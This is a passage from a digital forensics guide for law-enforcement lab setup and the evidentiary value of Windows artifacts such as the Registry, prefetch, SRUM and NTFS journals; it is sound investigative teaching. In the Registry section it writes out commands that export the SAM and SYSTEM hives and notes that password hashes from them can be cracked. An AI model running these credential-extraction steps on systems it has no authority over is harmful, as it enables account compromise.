This will do very little to add credibility to your reputation and may hinder you in the future when
you need to ask for more.
The way that I decided to go was to determine just what was necessary to get started and return to
ask for anything more as I encountered roadblocks.
Open communication and trust
By showing respect and understanding for the position and responsibility of the executive leadership
to the tax-paying citizens of our community, I was able to earn their trust and cooperation. I have
never received a negative response to any request that I have made. As soon as an obstacle was
encountered and a solution was needed that the lab did not already provide for, I made the request
and either received approval for what was needed or was given a timeline for when the funds
would be available. Open communication and trust are necessary for any relationship to maintain
its integrity, and it is no different for professional cooperation than it is for personal connection.
Always approach decision-makers with respect, and then console yourself with patience and faith
in their response. As an examiner, you are not always privy to all of the budgetary, and sometimes
legal or political, issues that may affect your request. This is where the trust that you would like to
be shown must be reciprocated in kind.
By approaching every situation in this way, you will earn the respect and trust of your executive
leadership and make your professional life more satisfying in the long run.
Physical Requirements
Physical security and accessibility
When you begin to create the business plan for the digital forensics lab, you will need to first find
a suitable space that will provide physical security and room to accommodate your personnel and
equipment. A small department using low-cost and free tools may only require a single examiner,
an office with one computer, and a desk. A larger agency may require space for several people,
workstations, evidence lockers, and lab equipment. The fact is that you can begin implementing
digital forensics in your agency with free tools and existing personnel and hardware. However, you
will find yourself running up against obstacles immediately and wanting better solutions. Either
way, it is because you are handling evidence that may implicate or exculpate someone of criminal
behavior that you need to take security very seriously from the start. Chain of custody and physical
access control should be at the forefront of your thoughts throughout the forensic process. At the
very least, the lab should be locked when unoccupied and all keyholders accounted for. Digital ID
scan access provides accountability and the ability to deny access, and is relatively low-cost to
implement.
Floor plans
The floor plan that you decide upon is going to be very distinctly individual to your agency’s needs
and capability. However, you should take into account the number of devices that you believe you
will be handling, the amount of time that you will have possession of them for storage purposes,
and how many people you will have assigned to the lab. If your lab only has one examiner, and
only handles a hundred or so mobile devices a year, then you may get by with a space as small
as a ten-by-ten office with a desk for your computer, a cabinet or shelves for your devices, and a
file cabinet for your case files. As you expand capabilities and personnel, however, you will quickly
outgrow that amount of space. With microscopes, faraday cages, and extra workstations, you will
require room for the movement of individuals between tables. With a greater number of devices,
you will need more room for shelves, charging cabinets, and workflow organization. Mobile devices
quickly begin stacking up and becoming disorganized chaos if you do not establish sound workflow
processes and case management practices. You need to know which devices are next in line, which
are being processed, and which are ready to be returned. If a device is lost while in your custody, it
will have serious consequences for yourself, your agency, and most importantly, for the case. Having
the space to organize your work properly is therefore of paramount importance.
Selecting Tools
Network Requirements
Your forensic workstations and tools may or may not require a connection to the internet, but when
they do, you should at least utilize a dedicated line and/or a virtual private network. Malware can
be transferred from devices to your system and network if you are not careful. Even the forensic
software that you have on your workstation can set off alarms in your IT department. Trust me
on that one. I speak from experience. It was just that sort of event that convinced my IT director
that I needed a dedicated connection. You may find that you need one connection for your forensic
workstations and another separate one for your administrative computer. Just be aware of the very
real danger to your network that is presented by strange devices. Even a detective bringing you a
thumb drive to place evidence on can present an unwitting threat. Always practice safe handling of
devices when considering making any connections to your system.
Selecting forensic workstations
This is perhaps the most common question asked when someone first considers getting into digital
forensics. What kind of computer is needed for the job? It is also the most fun part for those of us
who nerd out over computer specifications and configurations. Boiling it down, you will need great
processing power and vast storage. Always refer to the software that you choose first to determine
what the minimum and optimal specifications are for that particular tool. I have found that you will
basically be building a super gaming computer because of the amount of graphics processing that
you will need to accomplish. It is because of this that you may need to convince your superiors that
you are not trying to play video games in the lab when you are supposed to be working. That said,
I will give you the specifications that I had on my first workstation at the police department.
• Dell Precision 5820 Tower X-Series
• Intel Core i9-9820X CPU @ 3.30 GHz (3312 MHz), 10 cores, 20 logical processors
• Radeon Pro WX 5100 graphics card (I wanted an NVIDIA GeForce 3060 at the time)
• 128 GB RAM
• 1 TB SSD (for the operating system and program files)
• 2x 4 TB hard drives (for file storage)
I wanted an Alienware Aurora desktop, but compromised for the above setup. Never forget that you
are asking to spend other people’s money when working in Law Enforcement and you may have to
make concessions for that very reason. Always show gratitude and a positive attitude when granted
anything.
Selecting forensic software
I want to preface this section with the acknowledgment that I have made many friends in the field
of digital forensics in the few short years that I have been working in the industry. Some work for
companies that make competing software. I have found that collaboration even among competitors
is like nothing seen in any other market. That said, I will not be granting any single product my sole
endorsement, but rather will describe the pros and cons of each, as I see them.
The largest players in commercial off-the-shelf digital forensics solutions are Magnet Forensics,
Cellebrite, Oxygen Forensics, Belkasoft, Exterro, Basis Technology, MSAB, and EnCase. These are
not in any particular order, and I have not intentionally excluded any not listed. These are just the
products that I have had personal experience with and see most often discussed between examiners.
In my day-to-day operations, I use both Magnet AXIOM and Cellebrite, depending on which report
my detectives prefer. A smaller agency may not have the budget for both, or either. Autopsy is an
excellent free program from Basis Technology, created by Brian Carrier. I have used it to validate
evidence extracted with commercial tools to great success, and would recommend it as a must-have
for every lab for that very reason.
When considering open-source and free software, always use a test environment before implementing
it on a production network. There are many exciting and brilliant tools made freely available
to the community by their authors, some of which allow you to contribute code towards their
improvement. Thanks to Brian Carrier we have Autopsy; Eric Zimmerman gave us KAPE and EZ
Tools; and Alexis Brignoni, the Log Events and Properties Parser (xLEAPP) series. There are so many
wonderful free tools out there that you could fill an entire book with them, and you will discover
them and want to try them out as much as possible, as there is no single tool that does everything
perfectly. As an examiner, you will need to be a lifelong learner and stay connected to the community
to remain on top of new discoveries, tools, and techniques.
Selecting peripheral equipment
You will find very quickly that workstations and software are only the beginning of your expenditures.
Many peripheral devices and tools will also need to be purchased to assist with various
examinations. You can plan to purchase them upfront or as needed; in some cases, you may only
use a device once in several years. While this list is in no way exhaustive or exclusive, it is
representative of the tools that I purchased for my lab as I discovered the need for them.
• A digital camera for photographing devices and crime scenes. It is helpful to purchase one
capable of video recording in high definition and connecting to your workstation for file
transfer
• An external SSD drive for transferring files between workstations. The larger and faster, the
better
• Computer hand tools that can be purchased specifically for computer or mobile device repair
• A heat gun for melting the glue around a mobile device touchscreen
• A magnifying visor with a light for seeing small screws and writing
• Various cables for connecting to various types of hard drives and SSDs (e.g., IDE, ATA, SATA,
USB)
• Data transfer cables for various types of phones (e.g., Lightning, Micro USB, USB-C, Mini USB)
• An anti-static mat
• Write blocker for preventing data writes on target hard drives
• A charging cabinet for devices that are undergoing bruteforcing
• Faraday bags and a faraday cage for preventing devices from touching mobile networks
• External battery chargers for keeping low-power devices charged while transporting them from
the crime scene to the lab
• SIM card and SD card readers
• APC Battery backup and surge protector for your expensive workstations
There are many other items for which you may or may not discover the need as your caseload grows,
but these items are the most likely. You may also consider purchasing cloud services for the storage
of digital evidence or have your IT department set up dedicated server space that can be expanded.
Smaller agencies may just use hard drives stored in the evidence locker.
Planning for Disaster
You will want to have a disaster recovery plan for lightning strikes, flooding, fire, earthquakes, or
simply hardware failure and viruses. You will invest tens of thousands of dollars and countless
hours planning, purchasing, and setting up your lab; a good disaster recovery plan protects that
investment. Your plan might include backing up your workstation once per week. The rule is to store
at least one copy of backups on site and duplicate copies at an off-site location. You may want to log
all updates to your workstation in case you encounter an issue and need to roll back or troubleshoot
new problems. Keep your forensic workstation on a dedicated network of its own if it needs to have
an internet connection at all. Invest in a good antivirus and monitoring tool. In the recovery plan,
you will also need to consider upgrading components every two to three years, as wear will degrade
your equipment over time.
Certification and Training
Some US states require digital forensics examiners to be certified. Whether or not that is the case
for your location, it is good to consider having at least one examiner certified and trained to teach
others. There are non-profit organizations, such as the National White Collar Crime Center (NW3C),
that offer both training and certification for cybercrime examiners and investigators free of cost
to law enforcement and government personnel. The training is on par with for-profit organizations
and the certification is much less costly. There is no exam, as the certification is experience-based,
and it lasts for one year. As stated, there are also for-profit organizations that offer certification, and
individual vendors that certify users of their specific tools.
Why should you get certified?
In any case, certification is worth the investment of time and money and is greatly helpful when
called to the stand in court. Your testimony will carry more weight if you are certified, and the
knowledge gained from the training will help you make competent and confident statements when
cross-examined.
Where to find training
I always suggest beginning your quest for information at AboutDFIR.com¹⁸². You will
find ample resources and an updated list of training with prices. Some other sites to consider are
DFIRDiva.com¹⁸³ and DFIR.Training¹⁸⁴. The SANS Institute¹⁸⁵ has very reputable training and
certification programs that are recognized worldwide, though they are costly and not recommended
(by me) for inexperienced examiners. Their certification exams are open book and timed, and you are
given practice tests prior to taking the final. Should you achieve this level of certification, you will
definitely be considered a member of an elite class of digital forensics examiners.
Creating a training plan for your lab
Whether you are the only examiner or you have multiple people working in your lab, you need
a training plan for everyone, especially if they are trying to maintain certifications that require
annual credit hours for reinstatement.
Accreditation
Accreditation is not mandatory in the United States, but it is highly recommended. It may
become mandatory in the future and is therefore worth mentioning and describing. The ANSI-ASQ
National Accreditation Board (ANAB)¹⁸⁶ is a subsidiary of the American National Standards Institute
(ANSI)¹⁸⁷ and the American Society for Quality (ASQ)¹⁸⁸. To have your lab considered for
accreditation, ANAB will audit the lab’s tasks and functions to ensure correct procedures are being
followed consistently.
Budgeting for the lab
Digital Forensics is an expensive operation. You will need to budget appropriately for your lab to
continue successfully and responsibly. Plan for hardware and software licensing costs alongside
training, certification, and expansion costs. Create a monthly, quarterly, and annual expenditure
spreadsheet. Estimate your total annual number of examinations and the types of cases you expect,
as you may need to plan for the purchase of new software or hardware for special circumstances. Planning for
future operations is critical as technology evolves quickly and storage size on devices grows rapidly.
Training is absolutely necessary to maintain knowledge of new operating systems and hardware.
¹⁸²https://aboutdfir.com/
¹⁸³https://dfirdiva.com/
¹⁸⁴http://dfir.training/
¹⁸⁵https://www.sans.org/
¹⁸⁶https://anab.ansi.org/
¹⁸⁷https://ansi.org/
¹⁸⁸https://asq.org/
Duties and responsibilities
ANAB requires that specific objectives be determined for each role within a digital forensics lab by
the lab manager, who is responsible for establishing, enforcing, and reviewing procedures for case
management. The manager also plans for updates and upgrades and accounts for all activities and
training within the lab. Other lab members should have enough training to utilize their equipment
effectively and should report directly to the lab manager.
Privacy Policy
Any law enforcement digital forensics lab should consider having a privacy policy regarding the
handling of digital evidence. There are websites such as NATSAR.com¹⁸⁹ that offer model policies
for a price, but you can also reach out to the community through the Digital Forensics Discord Server
for free copies of other agency policies. Having a privacy policy will go far to protect your agency
and lab members from litigation in high-profile cases.
Standard Operating Procedures
It should go without saying that having Standard Operating Procedures (SOPs) developed, maintained,
and reviewed by the lab manager is a wise investment. Not only are they required for
accreditation, but they will also protect the agency from litigation in much the same way as a
privacy policy. By creating SOPs based on national standards from the Scientific Working
Group on Digital Evidence (SWGDE)¹⁹⁰ or the National Institute of Standards and Technology
(NIST)¹⁹¹, you can rest assured that your lab is operating within accreditation standards.
Chapter Summary
In summary, a law enforcement digital forensics lab operates to conduct criminal investigations and
store evidence. The outcome of a murder investigation and the exoneration of an innocent suspect
may be entirely determined by the work done by lab members. That responsibility should weigh
heavily upon each person involved and be considered in day-to-day operations as well as future
planning. The setup and maintenance of an effective lab can be an expensive operation, and the
obligation to tax-paying citizens should be a constant presence in the mind of the lab manager. As
a law enforcement examiner, your duty is to protect and serve the community and your agency.
Always remember that, and strive to make your lab better every day by improving your skills and
knowledge, those of other lab members, and your equipment. Serve with pride in knowing that your
mission is noble and impactful, and you will be joined by a global community of digital forensics
examiners who will welcome you into the fold.
¹⁸⁹https://natsar.com/
¹⁹⁰https://www.swgde.org/
¹⁹¹https://www.nist.gov/
Chapter 8 - Artifacts as Evidence
By Nisarg Suthar¹⁹²
Forensic Science
Before learning about artifacts as digital evidence, I’ll preface this chapter with the most fundamental
definition of basic science. So what is science? It is any field that follows the scientific
process. That process is cyclical and goes something like this:
• We make observations in nature.
• We form an initial hypothesis about something.
• We look for things that confirm or deny the formed hypothesis.
• If we find something that denies it, we form a new hypothesis and go back to making
observations.
• If we find something that confirms it, we continue making new observations to extend our
dataset and verify the hypothesis until the dataset is substantial in confirming it precisely and
accurately. If we further find something that denies the original hypothesis, we form a new
one by repeating the process.
¹⁹²https://linktr.ee/NisargSuthar
We never pollute this scientific process with biases or opinions. It is only as credible as the fact
finder’s neutrality. All scientists trust observations and verified prior research, discarding all
speculation.
16.1 - Attr: GliderMaven, CC BY-SA 4.0, via Wikimedia Commons
Ultimately, the goal of any science is not to state things in absolutes but in observations, experiments,
procedures, and conclusions. Even the fundamental laws of science are built on a basic foundation
of assumptions.
Much like any scientific field, ‘forensics’ or ‘criminalistics’ is a branch of science that deals with
identifying, collecting, and preserving evidence of a crime. It is not just identifying, collecting, and
preserving, but doing so in a forensically sound manner, meaning the evidence should not be altered
or allowed to stray from its true form.
Digital Forensics is a six-phase process including:
• Preparation: Making sure your suite of forensic tools is up to date, and destination media are
sanitized.
• Identification: Identifying the devices of interest at the site. Mobile phones, laptops, IoT devices,
USB drives, cameras, SD cards, etc. Anything with some type of digital memory.
• Collection: Acquiring the memory via imaging and hashing the sources for verification.
• Preservation: Using techniques viable for long-term storage of sensitive evidence. Also includes
maintaining a valid chain of custody.
• Analysis: Dissecting the acquired evidence. All puzzle solving and brainstorming happens in
this phase.
• Reporting: Preparing a concise and easily digestible report of your findings for people who may
not be technically inclined. The report must show forensic soundness for it to be admissible in
a court of law.
Types of Artifacts
Analysis is a major phase where forensicators discover different types of artifacts, ranging from plain
metadata to complex evidence of execution and residual traces. The vast gap in the difficulty
of retrieving or reconstructing evidence draws the fine line between E-Discovery and Digital
Forensics.
User data such as internet history, images, videos, emails, messages, etc., fall under E-Discovery. It
is relatively easy to reconstruct even from the unallocated space.
However, system data artifacts, which help support some view of the truth or determine how closely
a transpired event matches the evidence, are not that simple to parse manually with forensic
soundness. This is why forensicators often rely on well-known parsing tools, either commercial or
open source.
16.2 - Attr: Original from 6th slide in DVD included with E-Discovery: An Introduction to Digital Evidence by Amelia
Phillips, Ronald Godfrey, Christopher Steuart & Christine Brown, modified here as text removal
And that is the main difference between E-Discovery and Digital Forensics, depending on the
categorization of data alone. Both follow different procedures and have different scopes of execution.
Generally, E-Discovery can be confined to the logical partitions and the unallocated region,
whereas Digital Forensics operates in a much wider scope, solely due to the necessity of dealing with
complex data structures.
What is Parsing?
This brings us to parsing. We often throw the term around while working with a variety of
artifacts; “parse this, parse that”, but what does it mean in the real sense? To understand the parsing
methodology, tools, and techniques, we must be familiar with how the data being parsed was
originally meant to be handled. What was its structure by design? How can it be replicated?
Generally, it is some feature or underlying mechanism of the main operating system installed on
the device. Parsing tools are written to accurately mimic those functions of the operating system,
which make the raw data stored on the hardware human readable.
16.3 - Attr: Kapooht, CC BY-SA 3.0, via Wikimedia Commons
Think of the operating system as an abstraction layer between the end user and the intricacies of
raw data. It provides an interface to the user that hides the complexities of how computer data is
stored and presented.
Before parsing the artifacts and diving deep into analysis, you must fully understand how files are
generally handled by an operating system. As mentioned earlier, an operating system is just a very
sophisticated piece of software written by the manufacturers to provide an abstraction level between
the complexities of hardware interactions and the user.
In the context of file handling, operating systems either store files or execute files, both of which
require different types of memory. Also, note that storing files requires access to storage media such
as HDDs, SSDs, and flash drives, whereas executing files requires access to the microprocessor. Both
are handled by the operating system.
As you might already know, computers, or any electronic computing device for that matter, primarily
utilize two types of memory:
1. RAM (Random Access Memory):
• Volatile memory, only works for the time power is supplied.
• Used for assisting the execution of applications/software by the processor of the device.
2. ROM (Read Only Memory):
• Non-volatile memory, retains data even when not in use.
• Used for storing the application files for a larger period of time.
There are many sub-types of both RAM and ROM, but only the fundamental difference between them
concerns us here.
Now let’s look at the lifecycle of an application in two stages:
1. Production Cycle:
An application is a set of programs. A program is a set of code written by a programmer, generally in a
higher-level language that does not interact directly with machine-level entities such as registers,
buses, channels, etc. That code is written to the disk and then compiled to assembly,
a lower-level language that can interact directly with machine-level entities. Finally,
the assembly is converted to machine code consisting of 1s and 0s (also known as a binary or
executable file), which is now ready for its execution cycle.
2. Execution Cycle:
Now that the program is sitting on the disk waiting to be executed, it is first loaded into
RAM. The operating system informs the processor of the arrival of this program and allocates
resources as the processor makes them available. The processor’s job is to execute the
program one instruction at a time. The program can execute successfully if the processor is not
required for another task with a higher priority; if it is, the program is sent to the ready
queue. The program can also terminate if it fails for some reason. Finally, it is discarded
from RAM.
You can easily remember both of these cycles by drawing an analogy between electronic memory
and human memory. Here, I use chess as an example. Our brains, much like a computer, use two
types of memory:
1. Short-term (Working memory):
• For a game of chess, we calculate the moves deeply in a vertical manner for a specific line
based on the current position.
• This is calculative in nature. The calculation comes from the present situation.
2. Long-term (Recalling memory):
• At the opening stage in a game of chess, we consider the candidate moves widely in a
horizontal manner for many lines.
• This is instinctive in nature. Instinct comes from past experiences.
Understanding how an operating system parses the data from different sources, whether it is on
disk or in memory, will help you identify, locate, and efficiently retrieve different types of artifacts
necessary for an investigation.
Artifact-Evidence Relation
You will come across an ocean of different artifacts in your investigations, but artifacts have a very
strange relationship with what might potentially be considered evidence. Artifacts alone do not give
you the absolute truth of an event. They provide you with tiny peepholes through which you can
reconstruct and observe a part of the truth. In fact, one can never be sure if what they have is indeed
the truth in its entirety.
16.4 - Attr: Original by losmilzo on imgur, modified here as text removal
I always love to draw an analogy between the artifacts and the pieces of a puzzle, of which you’re
not certain to have the edge or the corner pieces. You gather what you can collect and try to paint
the picture as unbiased and complete as possible.
16.5 - Attr: By Stefan Schweihofer on Pixabay
That being said, if you apply the additional knowledge from metadata, OSINT, and HUMINT to
the parsed artifacts, you might have something to work with. For instance, say you were assigned
an employee policy violation case where an employee was using their work device for illegally
torrenting movies. Parsing the artifacts alone will give you information about the crime, but not
evidence. You would still need to prove that the face behind the keyboard at the time of the crime
was indeed the one your artifacts point to. So you would then look for CCTV footage around the
premises, going back to the Identification phase of the digital forensics lifecycle, and so on.
Because artifacts depend on correlation with some external factor, they form a direct
non-equivalence relation with evidence. Note, however, that this “rule”, if you will, applies only to
the broader scope of the investigation. In the narrower scope of a forensicator’s work, and for the
scope of your final forensic report, artifacts are most critical. Just keep in the back of your mind
that encountering an artifact alone doesn’t mean it is admissible evidence. Parse the artifact, make
notes, and document everything. Being forensically sound is more important than worrying about
completing the entire puzzle, because there will be no edge or corner pieces to it.
Examples
This section will cover how some of the less common artifacts can play into a case from a
bird’s-eye view. We won’t get into the technical specifics of parsing or extraction, but
rather the significance of those artifacts at a much higher level, including what each offers, proves,
and denies, and what its forensic value is. I suggest readers use these brief bits to spark
their curiosity about these important artifacts and research locating and parsing them on their
own.
Registry
About:
• The Windows Registry is a hierarchical database used by the Windows operating system to
store its settings and configurations. It also stores some user data pertaining to
user applications, activities, and other residual traces.
• The Registry is structured with what are called Hives or Hive Keys (HK) at the top-most level.
Each hive contains numerous keys, a key can contain multiple sub-keys, and sub-keys contain
fields with their values.
There are mainly two types of hive files:
1. System Hive Files:
• SAM (Security Account Manager): User account information such as hashed passwords,
and account metadata including last login timestamp, login counts, account creation
timestamp, group information, etc.
• SYSTEM: File execution times (Evidence of Execution), USB devices connected (Evidence
of Removable Media), local timezone, last shutdown time, etc.
• SOFTWARE: Information about both user and system software. Operating system information
such as version, build, name, and install timestamp. Last logged-on user, network
connections, IP addresses, IO devices, etc.
• SECURITY: Information about security measures and policies in place for the system.
2. User Specific Hive Files:
• Amcache.hve: Information about application executables (Evidence of Execution), full path,
size, last write timestamp, last modification timestamp, and SHA-1 hashes.
• ntuser.dat: Information about autostart applications, searched terms used in Windows
Explorer or Internet Explorer, recently accessed files, run queries, last execution times of
applications, etc.
• UsrClass.dat: Information about user-specific shellbags, covered in the next section.
Significance:
• Identifying malware persistence which can lead to the discovery of Indicators of Compromise
(IOCs).
• Proving the presence of removable media in a particular time frame, which can further help
with the acquisition of the same.
• Retrieving crackable user password hashes from the SAM and SYSTEM hives, which might
help access the encrypted partitions if the password was reused.
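As a quick illustration, on a live Windows system an examiner with administrative rights could export working copies of these hives with the built-in reg utility (a minimal sketch; the output paths are hypothetical, and in a dead-box examination you would instead pull the hive files from C:\Windows\System32\config out of the image):

reg save HKLM\SAM C:\triage\SAM.hiv
reg save HKLM\SYSTEM C:\triage\SYSTEM.hiv
reg save HKLM\SOFTWARE C:\triage\SOFTWARE.hiv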
Shellbags
About:
• Shellbags were introduced in Windows 7. They are a convenience feature that allows the operating
system to remember Windows Explorer configuration for user folders and a folder’s tree
structure.
• Whenever a folder is created, selected, right-clicked, deleted, copied, renamed, or opened,
shellbag information will be generated.
• Depending on the Windows version, shellbag information can be stored in either ntuser.dat,
UsrClass.dat, or both.
Significance:
• Reconstructing the tree structure for deleted folders. Helpful in providing an idea of the files
that used to exist when they cannot be carved from the unallocated space.
• Disproving denial of content awareness. If a subject claims they were simply not aware of
something existing on their system, shellbags can disprove their claims, given the obvious caveat
that exclusive usage of the machine must be proven.
• Getting partial information about the contents of removable media that were once mounted
on the system.
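For hands-on practice, Eric Zimmerman’s free SBECmd tool can parse shellbags from the hives mentioned above (a minimal sketch; the paths are hypothetical, and the flags should be verified against the tool’s built-in help):

SBECmd.exe -d C:\hives --csv C:\out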
Prefetch
About:
• Prefetch was first introduced in Windows XP. It is a memory management feature that
optimizes loading speeds for files that are frequently executed. Originally it was meant for
faster boot times, but it has since been extended to applications too. Hence, this artifact is
direct evidence of execution.
• We looked at the lifecycle of an application earlier; the prefetcher in Windows works in the
same way. It studies the first ∼10 seconds of an application launch and creates/updates the
corresponding prefetch file for faster loading on the next execution.
• Starting with Windows 10, prefetch files are compressed by default to save considerable
disk space, using the Xpress algorithm with Huffman encoding. For validation purposes,
forensicators must first decompress their prefetch files. Thanks to Eric¹⁹³ for this handy Python
script¹⁹⁴ that does exactly that.
16.6 - Working of Windows Prefetcher
The prefetcher has four possible settings:

Value  Description
0      Disabled
1      Application prefetching enabled
2      Boot prefetching enabled
3      Application & Boot prefetching enabled
This value is set from the registry key:

HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters

Forensicators can refer to this key to check if prefetching is disabled.
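On a live system, a quick check might look like the following (a minimal sketch; EnablePrefetcher is the value that holds the setting above):

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher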
¹⁹³https://twitter.com/ericrzimmerman
¹⁹⁴https://gist.github.com/EricZimmerman/95be73f6cd04882e57e6
Significance:
• Since it is evidence of execution, it helps identify anti-forensic attempts at bypassing detection.
Any automated anti-forensic tool that is run will in turn generate its own prefetch file.
• Useful in identifying and hunting ransomware executed. Once identified, analysts can look for
publicly available decryptors to retrieve encrypted files.
• By studying files and directories referenced by an executable, analysts can identify malware
families.
• Application execution from removable media or deleted partitions can be identified from the
volume information parsed.
• Timestamps for the last eight executions and the run counter are useful for frequency analysis
of malicious executables. Worms, which produce multiple prefetch files referencing the
exact same resources, are a prime example of this.
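As a sketch of what parsing this artifact looks like in practice, Eric Zimmerman’s free PECmd tool can process a single prefetch file or a whole directory (the file name and output path are hypothetical; verify the flags against the tool’s help):

PECmd.exe -f C:\Windows\Prefetch\CMD.EXE-89305D47.pf
PECmd.exe -d C:\Windows\Prefetch --csv C:\out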
Jumplists & LNK files
About:
• LNK files, or link files, are the shortcuts that a user or an application creates for quick access
to a file. LNK files themselves are rich in metadata such as timestamps, file path, file hash,
MAC address, volume information, and volume serial numbers.
• However, apart from the Recent Items and Start Menu folders, these LNK files are also found
embedded in jumplists.
• Jumplists were first introduced in Windows 7. They are a convenience feature of the Windows
Taskbar that gives a user quick access to recently used files in or by different applications.
Windows automatically creates these ‘lists’ in the right-click context menu, which can be used
to ‘jump’ to a frequently used file or action.
• There are two types of jumplists: automatic and custom. Automatic jumplists are created
automatically by Windows based on the most recently used (MRU) and most frequently used
(MFU) items. Custom jumplists are those explicitly created by the user, like bookmarks in a
browser or pinned files.
• Both categories of jumplists provide rich information like modified, accessed, and created
timestamps, and the absolute file path of the original file.
Significance:
• Useful for gaining information on applications uninstalled from and files deleted off the system,
as well as applications run and files opened from removable media.
• Again, being direct evidence of execution, jumplists are useful for timelining executed
applications and opened files.
• Useful for discovering partial user history, including URLs and bookmarks.
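Here too, a free parser exists: Eric Zimmerman’s JLECmd can process automatic and custom jumplists (a minimal sketch; the user profile path is a placeholder, and the flags should be checked against the tool’s help):

JLECmd.exe -d C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent --csv C:\out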
SRUDB.dat
About:
• SRUDB.dat is an artifact resulting from a feature introduced in Windows 8 called SRUM
(System Resource Usage Monitor), which tracks and monitors usage statistics of
OS resources such as network data sent and received, process ownership, power management
information, push notification data, and even which applications were in focus at a given time,
along with keyboard and mouse events, according to new research¹⁹⁵.
• It is capable of holding 30 to 60 days’ worth of tracking data at a time.
• So far, we haven’t looked at an artifact that can undoubtedly map a particular executed
process to a user. SRUDB.dat offers this critical information directly. It is one of the
most valuable artifacts due to the multidimensional applications of SRUM by the OS itself.
Significance:
• Useful in mapping a process to a user account, especially when the scope of acquisition is
restricted.
• Useful in mapping a process to network activity such as bytes sent and received. Helpful in
identifying data exfiltration incidents.
• Useful in timelining and distinguishing the network interfaces connected to, and hence
potentially estimating the whereabouts of the machine if those networks were far apart from
one another.
• Useful in analyzing power management information such as battery charge and discharge levels.
• Useful in establishing awareness, or lack thereof, of an application that would have been visible
on screen at some point in time, and of interaction with it by means of input devices.
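The database lives at C:\Windows\System32\sru\SRUDB.dat and, once extracted from an image, can be parsed with free tools such as Eric Zimmerman’s SrumECmd (a minimal sketch; the paths are hypothetical, and the flags should be verified against the tool’s help):

SrumECmd.exe -f E:\case\SRUDB.dat --csv C:\out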
hiberfil.sys
About:
• hiberfil.sys was first introduced in Windows 2000. It is a file used by Windows for memory
paging during hibernation or sleep cycles. It is also used in case of power failures.
• Paging is a mechanism to store the current contents of memory on disk, so they can later be
retrieved to continue from the same state. This avoids additional processing by applications
and optimizes resource allocation by the operating system. Windows also leverages this
mechanism to allow faster startup times from sleep states.
• It uses the Xpress algorithm for compression. Volatility’s imagecopy plugin can be used to
convert this artifact to a raw memory image.
¹⁹⁵https://aboutdfir.com/app-timeline-provider-srum-database/
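A minimal sketch of that conversion with Volatility 2 (the profile is an assumption and must match the source system):

vol.py -f hiberfil.sys --profile=Win7SP1x64 imagecopy -O hiberfil.raw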
Significance:
• This is one of those artifacts that straddles categorical types: it is a file on disk that holds
memory contents, and that extra memory content can add information to your investigation.
• When a locked device must be shut down during an investigation, this file can be retrieved at
the time of disk forensics, converted, and subjected to memory forensics for additional
information. In this way, partial volatile memory data can be retained.
• May contain NTFS records, browsing history, index records, registry data, and other useful
information.
pagefile.sys
About:
• Similar to hiberfil.sys, pagefile.sys is a swap file used by Windows to temporarily
hold contents that were meant to be loaded into memory but could not be due to
insufficient space. When the required amount of memory is freed, contents are transferred
from this artifact back into memory.
• The only known methods to get information from this artifact are the strings utility, a hex
editor, and filtering with regular expressions, as sketched below.
• It stores chunks of data capped at 4 KB in size.
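A minimal sketch of that string-and-regex approach on a Linux analysis machine (the pattern is purely illustrative):

strings -a pagefile.sys | grep -E 'https?://[a-zA-Z0-9./?=_-]+' | sort | uniq -c | sort -rn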
Significance:
• Useful in hunting IOCs in malware cases.
• Useful in carving smaller files that were meant to be loaded into memory, meaning it is
evidence of access. If an image was successfully carved from this artifact, it was opened, as it
was about to be loaded into the working memory of the device.
• May contain NTFS records, browsing history, index records, registry data, and other useful
information.
$MFT
About:
The next few artifacts, including this one, are part of the NTFS file system, one of the most
common file systems encountered when working with the Windows OS.
• MFT stands for Master File Table. It is a record of every file that exists or once existed on that
particular file system.
• It also contains other information like path to that file, file size, file extension, MACB
timestamps, system flags, whether it was copied or not, etc.
• Sometimes, if a file is small enough to be accommodated by its MFT entry, we can retrieve the
resident data from the record entry itself. An MFT entry is typically 1,024 bytes long, and small
files can fit completely within this range. This is known as MFT slack space.
Significance:
• Files that were deleted may still have an intact MFT record entry if not overwritten.
• Useful in retrieving smaller files from the record itself and the file history on disk.
• Important metadata like MACB timestamps can be obtained.
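As an example of parsing, Eric Zimmerman’s MFTECmd can process a $MFT extracted from an image (a minimal sketch; the paths are hypothetical):

MFTECmd.exe -f E:\case\$MFT --csv C:\out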
$I30
About:
• $I30 is called the index attribute of the NTFS file system. A $I30 file corresponding to each
directory is maintained by NTFS, as the B-tree constantly rebalances itself while different files
are created or deleted.
• $I30 is not a standalone file or artifact but a collection of multiple file system attributes, such
as $Bitmap, $INDEX_ROOT, and $INDEX_ALLOCATION. The 30 in its name comes
from the offset of $FILE_NAME in an MFT record.
• It keeps track of which files are in which directories, along with MACB timestamps and file
location.
• It also has slack space, similar to $MFT, but again for smaller files.
Significance:
• Original timestamps for deleted files can be retrieved.
• Useful in the detection of anti-forensic tools and timestomping, as the timestamps are $FILE_-
NAME attribute timestamps, which are not easily modifiable or accessible through the Windows
API.
• Important metadata like MACB timestamps can be obtained.
$UsnJrnl
About:
• The NTFS file system has a journaling mechanism, which logs all the transactions performed
in the file system as a contingency plan for system failures and crashes. This transaction data
is contained in the $UsnJrnl attribute file.
• $UsnJrnl, read as USN Journal, is the main artifact. It contains two alternate data streams,
$Max and $J, of which $J is of high interest to forensicators. It contains critical
data such as whether a file was overwritten, truncated, extended, created, closed, or deleted,
along with the corresponding timestamp for that file update action.
• $UsnJrnl tracks high-level changes to the file system, like file creation, deletion, renaming,
etc.
Significance:
• Useful to support or deny timestamp metadata. Potential evidence of deleted and renamed files,
i.e., evidence of existence.
• The slack space for this artifact isn’t managed at all, so additional data can be carved. Since
it only keeps data for a number of days, carving can be useful for recovering deleted records.
• Tracks changes to files and directories with the reason for the change.
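The $J stream can also be parsed with MFTECmd; supplying the matching $MFT lets the tool resolve full parent paths (a minimal sketch; the paths are hypothetical, and the flags should be verified against the tool’s help):

MFTECmd.exe -f E:\case\$J -m E:\case\$MFT --csv C:\out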
$LogFile
About:
• This is yet another artifact used by NTFS for journaling. The only difference is that $LogFile
is concerned with changes made to the MFT and not the entire NTFS file system. That means
it may directly contain the data that was changed, similar to how $MFT sometimes stores files
if they are small enough.
• Together, these four NTFS artifacts can say a lot about an event or a transaction when
performing file system forensics.
• $LogFile tracks low-level changes to the file system, like data that was changed.
Significance:
